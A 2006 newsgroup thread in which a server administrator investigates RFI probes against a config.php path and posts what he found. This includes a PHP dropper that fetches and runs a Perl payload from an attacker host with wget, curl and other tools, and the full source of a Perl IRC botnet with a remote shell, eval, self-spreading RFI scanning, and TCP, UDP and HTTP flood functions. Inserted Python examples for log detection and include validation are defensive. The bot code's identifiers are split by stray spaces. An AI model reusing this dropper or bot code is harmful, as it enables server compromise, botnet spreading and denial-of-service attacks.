PHP/Perl/Unix Virus: delete config.php files asap

There were some strange requests to my server asking for config.php
file (which I do not have in the requested location).

I did some investigation. Seems to be a virus written in perl,
exploiting a vulnerability in php code.

The requests are like this

216.120.231.252 - - [30/Aug/2006:13:28:03 -0500] "GET /algebra/about/history/config.php?returnpath=http://domates.1gig.biz/spread.txt? HTTP/1.1" 404 561 "-" "libwww-perl/5.805"

File spread.txt contains this:

<?
passthru('cd /tmp;wget http://domates.1gig.biz/tmr;perl tmr;rm -f tmr*');
passthru('cd /tmp;curl -O http://domates.1gig.biz/tmr;perl tmr;rm -f tmr*');
passthru('cd /tmp;lwp-download http://domates.1gig.biz/tmr;perl tmr;rm -f tmr*');
passthru('cd /tmp;lynx -source http://domates.1gig.biz/tmr >tmr;perl tmr;rm -f tmr*');
passthru('cd /tmp;fetch http://domates.1gig.biz/tmr >tmr;perl tmr;rm -f tmr*');
passthru('cd /tmp;GET http://domates.1gig.biz/tmr >tmr;perl tmr;rm -f tmr*');
?>

That script, obviously, tries very hard to download and execute 'tmr'.

'tmr' is, apparently, a perl script whose job SEEMS to be to listen on
IRC channels or some such and spread around by abusing a vulnerability
in 'config.php'. It is also seemingly used for DDOSing some servers
and who knows what else (shell function etc).

If the guy was smart, he's probably run some obfuscator on his code,
to make it harder to read.

I did a locate command on my fedora systems and found config.php in
some package called 'squirrelmail'. Which I immediately deleted, even
though it was not accessible through the web, just sitting there, but
I just do not want it.

My main question is, just what package or program owns config.php that
is vulnerable. It is a generic file name, so I would not be so quick
to suspect squirrelmail.

Here's the 'tmr' script:

#!/usr/bin/perl

# VulnScan v6 Stable By Morgan
#
# Note:
# DO NOT REMOVE COPYRIGHTS ...
# www.priv8.com.ar
#
# [Morgan]: http://priv8.com.ar/Zerocool.jpg
# [Morgan]: u got owned
# [ZEROCOOL]: bro
# [ZEROCOOL]: it's a rbot
# [ZEROCOOL]: i'm not fuckingstupid
# [ZEROCOOL]: uahuahuahuahua
#
#
# Greets to irc.gigachat.ne t :: #Morgan
#
#
# To work with auto-spread :
# Create a file named spread.txt with this :
#
# <?
# passthru('cd /tmp;wget http://priv8.com.ar/v6;perl v6;rm -f v6*');
# passthru('cd /tmp;curl -O http://priv8.com.ar/v6;perl v6;rm -f v6*');
# passthru('cd /tmp;lwp-download http://priv8.com.ar/v6;perl v6.txt;rm -f v6*');
# passthru('cd /tmp;lynx -source http://priv8.com.ar/v6 >v6;perl v6;rm -f v6*');
# passthru('cd /tmp;fetch http://priv8.com.ar/v6 >v6;perl v6;rm -f v6*');
# passthru('cd /tmp;GET http://priv8.com.ar/v6 >v6;perl v6;rm -f v6*');
# ?>
#
# Change the url .. put ur bot url in that file
# then use the command :
#
# !morgan !eval @cmdstring='htt p://yoursite.com/spread.txt';
# or directly change it from the code..
#
# Enjoy the bot ....
# /Morgan
my $processo = '[sys]';
use HTTP::Request;
use LWP::UserAgent;

#CONFIGURATION
my $linas_max='4';
my $sleep='5';
my @gstring='www.p riv8.com.ar';
my @cmdstring='htt p://domates.1gig.bi z/spread.txt';
my @adms=("h1dd3n" ,"Tamer");
my @canais=("#tame rlinux");
my $nick='Linux-';
my $ircname ='linux';
chop (my $realname = `uname -a`);
$servidor='h1dd 3n.pikolata.net ' unless $servidor;
my $porta='6121';
my $VERSAO = 'Vulnscan v6 www.priv8.com.a r';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARG V[0]" if $ARGV[0];
$0="$processo". "\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
# V6 OWNED YOUR BOX
# www.priv8.com.ar
# irc.gigachat.ne t - #Morgan
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];

my $IRC_socket = IO::Socket::INE T->new(Proto=>"tc p", PeerAddr=>"$ser vidor_con", PeerPort=>$port a_con) or return(1);
if (defined($IRC_s ocket)) {
$IRC_cur_socket = $IRC_socket;

$IRC_socket->autoflush(1) ;
$sel_cliente->add($IRC_socke t);

$irc_servers{$I RC_cur_socket}{ 'host'} = "$servidor_con" ;
$irc_servers{$I RC_cur_socket}{ 'porta'} = "$porta_con ";
$irc_servers{$I RC_cur_socket}{ 'nick'} = $meunick;
$irc_servers{$I RC_cur_socket}{ 'meuip'} = $IRC_socket->sockhost;
nick("$meunick" );
sendraw("USER $ircname ".$IRC_sock et->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_se rvers))) { conectar("$nick ", "$servidor" , "$porta"); }
delete($irc_ser vers{''}) if (defined($irc_s ervers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$I RC_cur_socket}{ 'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_ser vers{$fh});
}
@lines = split (/\n/, $msg);

for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_tem p.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}

sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?) \@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\00 1$/) {
notice("$pn", "\001VERSIO N mIRC v6.16 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick") {
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E| \!say)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$ onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep", "$1");
} else {
shell("$onde", "$arg");
}
}
}
}
elsif ($servarg =~ /^\:(.+?)\!(.+?) \@(.+?)\s+NICK\ s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$I RC_cur_socket}{ 'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick| ".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\ s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$I RC_cur_socket}{ 'nick'} = $meunick;
$irc_servers{$I RC_cur_socket}{ 'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}

# V6 OWNED YOUR BOX
# www.priv8.com.ar
# irc.gigachat.ne t - #Morgan
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21"," 22","23","25"," 80","113","135" ,"445","1025"," 5000","6660","6 661","6662","66 63","6665","666 6","6667","6668 ","6669","7000" ,"8080","8018") ;
my (@aberta, %porta_banner);
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INE T->new(PeerAddr =$hostip, PeerPort =$porta, Proto ='tcp', Timeout =4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}

if (@aberta) {
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
} else {
sendraw($IRC_cu r_socket,"PRIVM SG $printl :\002[SCAN]\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.* )\s+(\d+)\s+(\d +)/) {
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[TCP DDoSing]\002 Attacking ".$1.":".$2 ." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1 ","$2","$3" );
}
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[TCP DDoSing]\002 Attack done ".$1.":".$2."." );
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[VERSION]\002 w0rmb0t ver ".$VERSAO);
}
#SCANNER
if ($funcarg =~ /^rfiscan\s+(\d+ )\s+(.*)/) {
$boturl=$2;
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[v6]\002 Scan started.");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploit ed = 0;
while($1>$cur_t ime){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
#sendraw($IRC_c ur_socket, "PRIVMSG #debug :\002[v6|Exploiting]\002 ".$url2."\n\n") ;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url2 ="http://".$path."/".$boturl."@cmd string?";

print "\n".$url2."\n\ n";
# V6 OWNED YOUR BOX
# www.priv8.com.ar
# irc.gigachat.ne t - #Morgan

my $req=HTTP::Requ est->new(GET=>$url2 );
my $ua=LWP::UserAg ent->new();
$ua->timeout(10);
my $response=$ua->request($req );

if ($response->is_success) {
if( $response->content =~ /By/ && $response->content =~ /Morgan/ ){
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[v6|VULN]\002 ".$url2." \n\n");
}
}
else {
print 'Errore: ',$path,$respon se->status_line, "\n";
}
}
}
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[v6]\002 Scan finished in ".$1." seconds.");
}
if ($funcarg =~ /^httpflood\s+(. *)\s+(\d+)/) {
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[HTTP DDoSing]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INE T->new(proto=>'tc p', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConne ction: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.* )\s+(\d+)\s+(\d +)/) {
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[UDP DDoSing]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
my ($dtime, %pacotes) = udpflooder("$1" , "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cu r_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{i cmp}+$bytes{igm p}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}
# V6 OWNED YOUR BOX
# www.priv8.com.ar
# irc.gigachat.ne t - #Morgan
sub ircase {
my ($kem, $printl, $case) = @_;

if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\ s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\ d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+ )\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
# V6 OWNED YOUR BOX
# www.priv8.com.ar
# irc.gigachat.ne t - #Morgan
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cu r_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max ") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
# V6 OWNED YOUR BOX
# www.priv8.com.ar
# irc.gigachat.ne t - #Morgan
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto ,$j,$l,$t);
$ia=inet_aton($ _[0]);
$pa=sockaddr_in ($_[1],$ia);
$ftime=$_[2];
$proto=getproto byname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_IN ET,SOCK_STREAM, $proto);
connect($t,$pa) ||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
# V6 OWNED YOUR BOX
# www.priv8.com.ar
# irc.gigachat.ne t - #Morgan
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;

socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($po rta, $iaddr)) and $pacotes{igmp}+ +;
send(SOCK2, $msg, 0, sockaddr_in($po rta, $iaddr)) and $pacotes{udp}++ ;
send(SOCK3, $msg, 0, sockaddr_in($po rta, $iaddr)) and $pacotes{icmp}+ +;
send(SOCK4, $msg, 0, sockaddr_in($po rta, $iaddr)) and $pacotes{tcp}++ ;

for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($po rta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_tim e, %pacotes);
}

sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMS G $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMS G $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}

# V6 OWNED YOUR BOX
# www.priv8.com.ar
# irc.gigachat.ne t - #Morgan

sub fetch(){
my $rnd=(int(rand( 9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
{
my @dominios = ("nodom");
my @str;

foreach $dom (@dominios)
{
push (@str,"@gstring ");
}

my $query="www.goo gle.com/search?q=";
$query.=$str[(rand(scalar(@s tr)))];
$query.="&num=$ n&start=$s";
my @lst=();
#sendraw("privm sg #Morgan :DEBUG only test googling: ".$query."" );
my $page = http_query($que ry);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|tr anslate/){
push (@lst,$1);
}
}
return (@lst);
}

sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INE T->new(PeerAddr=> "$host",PeerPor t=>"80",Proto=> "tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept : */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};

return $page;
}
}
# V6 OWNED YOUR BOX
# www.priv8.com.ar
# irc.gigachat.ne t - #Morgan

# NOTE: DONT REMOVE COPYRIGHTS

Aug 30 '06 #1
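The access-log line quoted in the post is a remote file inclusion (RFI) probe: a query parameter (returnpath) whose value is a URL pointing at the attacker's spread.txt, sent by a libwww-perl client. The following is an added example, not code from the original post, of a small Python detector that parses Apache combined-format log lines, flags any query parameter whose value is a remote URL, records the libwww-perl user agent, and rates a 2xx answer as worth investigating because it means the requested script actually exists. The first sample line is the one from the post with its spacing repaired; the remaining lines, IP addresses and hostnames are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache/NCSA combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A parameter value that is itself a URL is the signature of an RFI probe.
REMOTE_VALUE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)
# User-agent marker taken from the post's log line; extend with others seen in your logs.
SCANNER_UA_MARKERS = ("libwww-perl",)

# Constructed sample: line 1 is the request quoted in the post (spacing repaired);
# the other lines, their IPs and their hostnames are made up for this example.
SAMPLE_LOG = """\
216.120.231.252 - - [30/Aug/2006:13:28:03 -0500] "GET /algebra/about/history/config.php?returnpath=http://domates.1gig.biz/spread.txt? HTTP/1.1" 404 561 "-" "libwww-perl/5.805"
10.0.0.5 - - [30/Aug/2006:13:29:10 -0500] "GET /algebra/about/history/index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.0.0.9 - - [30/Aug/2006:13:31:44 -0500] "GET /shop/cart.php?page=ftp%3A%2F%2Fexample.invalid%2Fx.txt%3F HTTP/1.1" 200 88 "-" "Mozilla/4.0"
10.0.0.5 - - [30/Aug/2006:13:32:01 -0500] "GET /search.php?q=http+proxy+settings HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def remote_params(target):
    """Split the request target and return (path, [(param, value, remote_host), ...])
    for every query parameter whose decoded value is a remote URL."""
    parts = urlsplit(target)
    hits = []
    # parse_qsl percent-decodes values, so an encoded ftp%3A%2F%2F... is caught too.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_VALUE_RE.match(value):
            hits.append((key, value, urlsplit(value.strip()).hostname))
    return parts.path, hits


def scan_log(text):
    """Scan log text and return one finding dict per RFI-style parameter seen."""
    findings = []
    for raw in text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        path, hits = remote_params(rec["target"])
        ua_flag = any(marker in rec["ua"] for marker in SCANNER_UA_MARKERS)
        for key, value, host in hits:
            findings.append({
                "ip": rec["ip"], "time": rec["ts"], "path": path,
                "param": key, "remote_host": host, "value": value,
                "status": int(rec["status"]), "suspicious_ua": ua_flag,
                # A 404 is a probe against a script you do not have; a 2xx means the
                # script exists and its handling of that parameter must be reviewed.
                "severity": "investigate" if rec["status"].startswith("2") else "probe",
            })
    return findings


def summarize(findings):
    """Aggregate findings per source IP: probe count and the remote hosts referenced."""
    per_ip = defaultdict(lambda: {"probes": 0, "hosts": set()})
    for f in findings:
        per_ip[f["ip"]]["probes"] += 1
        per_ip[f["ip"]]["hosts"].add(f["remote_host"])
    return {ip: {"probes": d["probes"], "hosts": sorted(d["hosts"])}
            for ip, d in per_ip.items()}


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:12} {f['ip']:16} {f['path']} {f['param']}={f['value']}"
              f" [{f['status']}] ua_flag={f['suspicious_ua']}")
    print(summarize(scan_log(SAMPLE_LOG)))
```

Run it against a real access_log by replacing SAMPLE_LOG with the file contents; the "investigate" findings are the ones to act on, since a 404 only tells you the scanner guessed a path you do not serve.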
Ignoramus6539 wrote:
> There were some strange requests to my server asking for config.php
> file (which I do not have in the requested location).

Nice one Ignoramus6539

> I did some investigation. Seems to be a virus written in perl,
> exploiting a vulnerability in php code.

Sure looks like it. Is anyone daft enough to include($get_parameter)?

> I did a locate command on my fedora systems and found config.php in
> some package called 'squirrelmail'. Which I immediately deleted, even
> though it was not accessible through the web, just sitting there, but
> I just do not want it.

Oooh. "Some package called..." sloppy housekeeping!

Actually, although Squirrelmail was vulnerable to this kind of attack
(http://www.sans.org/resources/malwar...99d19913a177c2,
http://www.idefense.com/intelligence...lay.php?id=191)
the developers are relatively good about releasing fixes.

Your attacker seems to be looking for phpListPro
(http://www.frsirt.com/english/advisories/2006/1325).

Usually script kiddies don't look to see what you're running before
unleashing all their dogs on your servers.

> My main question is, just what package or program owns config.php that
> is vulnerable. It is a generic file name, so I would not be so quick
> to suspect squirrelmail.

Next time try Google first :) and give us a URL for the code.

C.

Aug 30 '06 #2
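Colin's include($get_parameter) is the PHP pattern the probe depends on: a request parameter handed straight to include(), so that returnpath=http://.../spread.txt? makes the server fetch and execute the attacker's file. As an added example, not from the thread, here is the check a handler should apply before it resolves a user-supplied page name to a file: refuse any URL scheme or scheme-relative path, refuse absolute paths and NUL bytes, optionally require an allowlist, and confine the resolved path to the application directory. It is written in Python rather than PHP so it runs stand-alone; BASE_DIR, ALLOWED_PAGES and the file names are hypothetical.

```python
import os
from urllib.parse import urlsplit

BASE_DIR = "/srv/app"                                       # hypothetical web root
ALLOWED_PAGES = {"pages/about.php", "pages/history.php"}    # hypothetical allowlist


class UnsafeIncludeError(ValueError):
    """Raised when a user-supplied include name must not be resolved."""


def resolve_include(base_dir, requested, allowed=None):
    """Map a user-supplied page name to a file path confined to base_dir.

    Each check closes one way a value such as http://host/spread.txt? or
    ../../etc/passwd would otherwise reach include().
    """
    if not requested or "\x00" in requested:
        raise UnsafeIncludeError("empty or NUL-containing include name")
    # Any scheme (http://, ftp://, php://, data:) would make include() read
    # code from elsewhere; a leading '//' is a scheme-relative URL.
    if urlsplit(requested).scheme or requested.startswith("//"):
        raise UnsafeIncludeError(f"remote or stream include refused: {requested!r}")
    if os.path.isabs(requested):
        raise UnsafeIncludeError(f"absolute path refused: {requested!r}")
    if allowed is not None and requested not in allowed:
        raise UnsafeIncludeError(f"not in allowlist: {requested!r}")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # realpath collapses '..' and symlinks; the result must still sit under base.
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafeIncludeError(f"path escapes {base}: {requested!r}")
    return candidate


def is_safe_include(requested, base_dir=BASE_DIR, allowed=None):
    """True if the name would be accepted; handy for logging rejected requests."""
    try:
        resolve_include(base_dir, requested, allowed)
        return True
    except UnsafeIncludeError:
        return False


if __name__ == "__main__":
    for name in ("pages/about.php", "http://domates.1gig.biz/spread.txt?",
                 "../../../etc/passwd", "php://input"):
        print(f"{name!r:45} -> {'ok' if is_safe_include(name) else 'REFUSED'}")
```

The allowlist is the strongest of the checks and, where the set of includable pages is known, should be the only one that matters; the others are defence in depth for code paths that cannot enumerate their pages.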
On Wed, 30 Aug 2006 19:45:54 GMT, Colin McKinnon <co**********************@ntlworld.deletemeunlessURaBot.com> wrote:
> Ignoramus6539 wrote:
> > There were some strange requests to my server asking for config.php
> > file (which I do not have in the requested location).
>
> Nice one Ignoramus6539
>
> > I did some investigation. Seems to be a virus written in perl,
> > exploiting a vulnerability in php code.
>
> Sure looks like it. Is anyone daft enough to include($get_parameter)?

I think that the get parameter was mentioned in the access_log line.

> > I did a locate command on my fedora systems and found config.php in
> > some package called 'squirrelmail'. Which I immediately deleted, even
> > though it was not accessible through the web, just sitting there, but
> > I just do not want it.
>
> Oooh. "Some package called..." sloppy housekeeping!

Yep. Point taken.

> Actually, although Squirrelmail was vulnerable to this kind of attack
> (http://www.sans.org/resources/malwar...99d19913a177c2,
> http://www.idefense.com/intelligence...lay.php?id=191)
> the developers are relatively good about releasing fixes.
>
> Your attacker seems to be looking for phpListPro
> (http://www.frsirt.com/english/advisories/2006/1325).
>
> Usually script kiddies don't look to see what you're running before
> unleashing all their dogs on your servers.

Absolutely. They probably googled for some keywords on phpListPro and
found them under /algebra/about/history/ directory.

> > My main question is, just what package or program owns config.php that
> > is vulnerable. It is a generic file name, so I would not be so quick
> > to suspect squirrelmail.
>
> Next time try Google first :) and give us a URL for the code.

Well, I thought that the URLs might disappear soon. If you would like
me to place code on my own webpage, I will be glad to do so.

i

Aug 30 '06 #3
Colin McKinnon wrote:
Ignoramus6539 wrote:
Whoops - sorry for cross-posting the reply too.

(rec.crafts.met alworking????)

C.
Aug 30 '06 #4
On Wed, 30 Aug 2006 20:22:50 GMT, Colin McKinnon
<co**********************@ntlworld.deletemeunlessURaBot.com> wrote:
> Whoops - sorry for cross-posting the reply too.
>
> (rec.crafts.metalworking????)

S'Okay, mostly. Leave it in, we might learn something.

Igor hangs out in r.c.m all the time, and more than a few of the
people here are Linux Nerds as well as machinists. ;-) (I need to
learn it.) So I guess he thinks it's relevant enough to crosspost it
here, and I for one will humor him on it.

--<< Bruce >>--

Aug 31 '06 #5
